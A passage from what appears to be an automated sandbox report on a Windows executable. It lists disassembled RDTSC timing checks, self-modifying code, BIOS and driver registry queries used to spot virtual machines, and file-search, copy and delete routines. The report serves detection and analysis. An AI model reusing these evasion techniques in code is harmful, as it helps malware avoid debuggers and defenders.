              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B396 second address: D6B39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B39F second address: D6B3A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71DB6 second address: D71DDA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007F11A1057FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F11A1057FB4h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71F18 second address: D71F1D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72069 second address: D7208B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F11A1057FA6h 0x0000000a jmp 00007F11A1057FB4h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D722D9 second address: D722DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72598 second address: D725C1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11A1057FBFh 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F11A1057FA6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C183 second address: D7C194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F11A12050B6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C194 second address: D7C198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C198 second address: D7C1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A12050BAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F11A12050B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C1B1 second address: D7C1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C1B8 second address: D7C1C9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F11A12050BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BB72 second address: D7BB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BB78 second address: D7BB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F11A12050B6h 0x0000000a popad 0x0000000b je 00007F11A12050B8h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BB8B second address: D7BB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A1057FAAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BB9B second address: D7BB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BB9F second address: D7BBA9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F11A1057FA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BBA9 second address: D7BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F11A12050B6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BE20 second address: D7BE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BE28 second address: D7BE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A12050BCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87538 second address: D8753C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8753C second address: D87546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87546 second address: D8755C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A1057FB2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8755C second address: D87587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050BDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F11A12050C5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D870D7 second address: D870DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8725D second address: D87269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnp 00007F11A12050B6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C318 second address: D8C324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F11A1057FA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BEAD second address: D8BEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99EFD second address: D99F0E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F11A1057FAAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C0ED second address: D9C0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C0F3 second address: D9C0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C0F8 second address: D9C109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A12050BDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BF61 second address: D9BF6F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007F11A1057FA6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BF6F second address: D9BF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BF73 second address: D9BF77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5FFB second address: CB5FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2CD4 second address: DA2CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2F4B second address: DA2F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2F4F second address: DA2F5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F11A1057FA6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2F5D second address: DA2F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA30BB second address: DA30BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA30BF second address: DA30C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA30C3 second address: DA30DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F11A1057FA8h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 push ebx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3241 second address: DA3245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3245 second address: DA3249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3249 second address: DA324F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA33E5 second address: DA33EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3537 second address: DA353B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3FEF second address: DA3FFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F11A1057FA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3FFA second address: DA401A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A12050C5h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA80CF second address: DA80EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F11A1057FB5h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA80EB second address: DA80FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F11A12050B6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9CAF second address: DA9CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB2851 second address: DB286F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050BCh 0x00000007 jo 00007F11A12050B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F11A12050BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7317 second address: DC731B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC731B second address: DC731F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9E14 second address: DC9E20 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007F11A1057FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9E20 second address: DC9E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9F78 second address: DC9F86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A1057FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9F86 second address: DC9F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDFBE2 second address: DDFBE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDFBE8 second address: DDFBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDFBEC second address: DDFC1F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F11A1057FB9h 0x0000000d jmp 00007F11A1057FB2h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE02E8 second address: DE02F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F11A12050BBh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0545 second address: DE054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0862 second address: DE086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F11A12050BEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4C7B second address: DE4C7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4E22 second address: DE4E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE870B second address: DE8710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547021B second address: 547021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547021F second address: 5470225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470225 second address: 547027E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 08h 0x0000000d pushfd 0x0000000e jmp 00007F11A12050C3h 0x00000013 sub cx, A9CEh 0x00000018 jmp 00007F11A12050C9h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F11A12050BCh 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547027E second address: 5470284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470284 second address: 5470288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470288 second address: 54702B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F11A1057FB9h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702B2 second address: 54702B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702B6 second address: 54702BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702BC second address: 54702D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A12050C1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547031F second address: 5470325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470325 second address: 5470376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F11A12050C9h 0x00000011 pop eax 0x00000012 pushfd 0x00000013 jmp 00007F11A12050C1h 0x00000018 xor esi, 4D131B96h 0x0000001e jmp 00007F11A12050C1h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470376 second address: 54703F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F11A1057FB7h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F11A1057FB9h 0x0000000f add ah, 00000056h 0x00000012 jmp 00007F11A1057FB1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ax, dx 0x00000024 pushfd 0x00000025 jmp 00007F11A1057FAFh 0x0000002a jmp 00007F11A1057FB3h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703F1 second address: 5470409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A12050C4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470409 second address: 5470457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F11A1057FB8h 0x00000013 add ah, 00000068h 0x00000016 jmp 00007F11A1057FABh 0x0000001b popfd 0x0000001c jmp 00007F11A1057FB8h 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470457 second address: 547046D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547046D second address: 5470471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470471 second address: 547048C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B4F9D1 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B4FA9B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CF144C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CEFD08 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D1BE16 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27044
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-25862
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00913910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00913910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0091E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00911250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00911250
